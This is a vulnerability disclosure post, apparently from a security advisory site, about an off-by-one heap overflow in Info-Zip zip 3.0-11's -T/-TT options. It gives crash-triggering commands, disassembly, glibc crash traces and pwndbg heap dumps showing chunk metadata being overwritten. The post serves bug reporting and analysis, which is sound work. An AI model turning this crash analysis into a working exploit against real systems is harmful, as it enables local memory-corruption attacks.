Info-Zip Zip 3.0-11 Crash

2018.07.08
Credit: Sehun Oh
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Hello, I found info-zip's zip command's crash. This vulnerability is occured by off by one. I don't use the malformed file for crash. just command. And if 'zip' binary is added to function, it can be exploitable vulnerability I think. [ Environment ] OS : Ubuntu 16.04.3 LTS Kernel : Linux ubuntu 4.4.0-127-generic #153-Ubuntu SMP Sat May 19 10:58:46 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux info-zip zip : 3.0-11 [ Condition ] * using option -T, -TT * Vulnerability is occured by off by one. : linux command execution using option -T, -TT : To execute the command used in the -T and -TT options, it is stored in the heap before the system, and the data to be stored is parsed as follows. : 0x18 => zip flagT.zip -T -TT 'AAAAAAAAAAAA' => AAAAAAAAAAAA 'flagT.zip' : 0x38 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip' : 0x58 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip' : When an instruction is stored in the heap, it is occured by off by one. : It happens in the code below. Disassembly - .text:000000000040A052 mov rax, [rsp+48h+var_40] .text:000000000040A057 mov word ptr [r15+rax+2], 27h Hexray - *(_WORD *)&v7[v16 + 2] = 0x27; [ Error Msg ] CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAA' <- die process sh: 1: AAAAAAAAAAAA: not found *** Error in `zip': free(): invalid next size (fast): 0x00000000009ef350 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c] zip[0x409f25] zip[0x4079ef] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830] zip[0x408529] ======= Memory map: ======== 00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip 0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip 0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip 0062f000-0067e000 rw-p 00000000 00:00 0 009ee000-00a0f000 rw-p 00000000 00:00 0 [heap] 7f4728000000-7f4728021000 rw-p 00000000 00:00 0 7f4728021000-7f472c000000 ---p 00000000 00:00 0 7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive 7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7f4730372000-7f4730376000 rw-p 00000000 00:00 0 7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so 7f4730786000-7f473078a000 rw-p 00000000 00:00 0 7f47307aa000-7f47307ab000 rw-p 00000000 00:00 0 7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so 7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so 7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0 7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0 [stack] 7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0 [vvar] 7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] zip error: Interrupted (aborting) *** Error in `zip': free(): invalid pointer: 0x00000000009ef370 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c] zip[0x40873e] zip[0x4090cb] zip[0x409279] /lib/x86_64-linux-gnu/libc.so.6(+0x354b0)[0x7f472ffe14b0] /lib/x86_64-linux-gnu/libc.so.6(gsignal+0x38)[0x7f472ffe1428] /lib/x86_64-linux-gnu/libc.so.6(abort+0x16a)[0x7f472ffe302a] /lib/x86_64-linux-gnu/libc.so.6(+0x777ea)[0x7f47300237ea] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c] zip[0x409f25] zip[0x4079ef] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830] zip[0x408529] ======= Memory map: ======== 00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip 0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip 0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip 0062f000-0067e000 rw-p 00000000 00:00 0 009ee000-00a0f000 rw-p 00000000 00:00 0 [heap] 7f4728000000-7f4728021000 rw-p 00000000 00:00 0 7f4728021000-7f472c000000 ---p 00000000 00:00 0 7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive 7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7f4730372000-7f4730376000 rw-p 00000000 00:00 0 7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so 7f4730786000-7f473078a000 rw-p 00000000 00:00 0 7f47307a9000-7f47307aa000 rw-p 00000000 00:00 0 7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so 7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so 7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0 7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0 [stack] 7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0 [vvar] 7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' <- not die process sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAA: not found *** Error in `zip': corrupted size vs. prev_size: 0x0000000001702190 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa2c7f497e5] /lib/x86_64-linux-gnu/libc.so.6(+0x7e913)[0x7fa2c7f50913] /lib/x86_64-linux-gnu/libc.so.6(+0x81cde)[0x7fa2c7f53cde] /lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fa2c7f56184] /lib/x86_64-linux-gnu/libc.so.6(_IO_file_doallocate+0x55)[0x7fa2c7f3f1d5] /lib/x86_64-linux-gnu/libc.so.6(_IO_doallocbuf+0x34)[0x7fa2c7f4d594] /lib/x86_64-linux-gnu/libc.so.6(_IO_file_overflow+0x1c8)[0x7fa2c7f4c8f8] /lib/x86_64-linux-gnu/libc.so.6(_IO_file_xsputn+0xad)[0x7fa2c7f4b28d] /lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0xd1)[0x7fa2c7f1f241] /lib/x86_64-linux-gnu/libc.so.6(__fprintf_chk+0xf9)[0x7fa2c7fe8bc9] zip[0x40a0a4] zip[0x4079ef] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fa2c7ef2830] zip[0x408529] ======= Memory map: ======== 00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip 0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip 0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip 0062f000-0067e000 rw-p 00000000 00:00 0 01701000-01722000 rw-p 00000000 00:00 0 [heap] 7fa2c0000000-7fa2c0021000 rw-p 00000000 00:00 0 7fa2c0021000-7fa2c4000000 ---p 00000000 00:00 0 7fa2c79e4000-7fa2c79fa000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fa2c79fa000-7fa2c7bf9000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fa2c7bf9000-7fa2c7bfa000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fa2c7bfa000-7fa2c7ed2000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive 7fa2c7ed2000-7fa2c8092000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7fa2c8092000-7fa2c8292000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7fa2c8292000-7fa2c8296000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7fa2c8296000-7fa2c8298000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so 7fa2c8298000-7fa2c829c000 rw-p 00000000 00:00 0 7fa2c829c000-7fa2c82ab000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7fa2c82ab000-7fa2c84aa000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7fa2c84aa000-7fa2c84ab000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7fa2c84ab000-7fa2c84ac000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4 7fa2c84ac000-7fa2c84d2000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so 7fa2c86ac000-7fa2c86b0000 rw-p 00000000 00:00 0 7fa2c86d0000-7fa2c86d1000 rw-p 00000000 00:00 0 7fa2c86d1000-7fa2c86d2000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so 7fa2c86d2000-7fa2c86d3000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so 7fa2c86d3000-7fa2c86d4000 rw-p 00000000 00:00 0 7ffc0dc06000-7ffc0dc27000 rw-p 00000000 00:00 0 [stack] 7ffc0dd37000-7ffc0dd3a000 r-np 00000000 00:00 0 [vvar] 7ffc0dd3a000-7ffc0dd3c000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] zip error: Interrupted (aborting) [ Debugging ] set follow-fork-mode parent b*0x0000000000409F13 b*0x0000000000409E11 r flagT.zip -T -TT 'AAAAAAAAAAAA' * Case 1 : zip flagT.zip -T -TT 'AAAAAAAAAAAA' : this case malloc 0x18 size. : so, overwrite next chunk size to null. (off by one) # Not Crash pwndbg> x/32gx 0x67f340 0x67f340: 0x0000000000000230 0x0000000000000020 0x67f350: 0x4141414141414141 0x616c662720414141 0x67f360: 0x002770697a2e5467 0x00000000000000c1 <- off by one 0x67f370: 0x00000000000a031e 0x000000004ce40567 0x67f380: 0x0000000040a61838 0x0000000000000003 0x67f390: 0x0000000000000003 0x0000001800000004 0x67f3a0: 0x0000000000000000 0x0000000000000001 0x67f3b0: 0x0000000000000000 0x0000000081b40000 0x67f3c0: 0x000000000067f490 0x0000000000000000 0x67f3d0: 0x000000000067f450 0x0000000000000000 0x67f3e0: 0x000000000067f430 0x000000000067f470 0x67f3f0: 0x000000000067f4d0 0x0000000000000000 0x67f400: 0x0000000000000000 0x0000000000000000 0x67f410: 0x0000000000000000 0x0000000000000000 0x67f420: 0x0000000000000000 0x0000000000000021 0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78 # Crash 0x67f340: 0x0000000000000230 0x0000000000000020 0x67f350: 0x4141414141414141 0x6c66272041414141 0x67f360: 0x2770697a2e546761 0x0000000000000000 <- off by one 0x67f370: 0x00000000000a031e 0x000000004ce40567 0x67f380: 0x0000000040a61838 0x0000000000000003 0x67f390: 0x0000000000000003 0x0000001800000004 0x67f3a0: 0x0000000000000000 0x0000000000000001 0x67f3b0: 0x0000000000000000 0x0000000081b40000 0x67f3c0: 0x000000000067f490 0x0000000000000000 0x67f3d0: 0x000000000067f450 0x0000000000000000 0x67f3e0: 0x000000000067f430 0x000000000067f470 0x67f3f0: 0x000000000067f4d0 0x0000000000000000 0x67f400: 0x0000000000000000 0x0000000000000000 0x67f410: 0x0000000000000000 0x0000000000000000 0x67f420: 0x0000000000000000 0x0000000000000021 0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78 * Case 2 : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' # crash : before __fprintf_chk@plt <0x402330> 0x67f150: 0x0000000000000000 0x0000000000000041 0x67f160: 0x000000000067f0b0 0x4141414141414141 0x67f170: 0x4141414141414141 0x4141414141414141 0x67f180: 0x4141414141414141 0x6c66272041414141 0x67f190: 0x2770697a2e546761 0x0000000000000100 <- off by one ^ prev_size # not crash : before __fprintf_chk@plt <0x402330> 0x67f150: 0x0000000000000000 0x0000000000000041 0x67f160: 0x000000000067f0b0 0x4141414141414141 0x67f170: 0x4141414141414141 0x4141414141414141 0x67f180: 0x4141414141414141 0x616c662720414141 0x67f190: 0x002770697a2e5467 0x00000000000001f1 : after __fprintf_chk@plt <0x402330> 0x67f150: 0x0000000000000000 0x0000000000000251 0x67f160: 0x00007ffff7bc1db8 0x00007ffff7bc1db8 0x67f170: 0x4141414141414141 0x4141414141414141 0x67f180: 0x4141414141414141 0x616c662720414141 0x67f190: 0x002770697a2e5467 0x0000000000000211


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top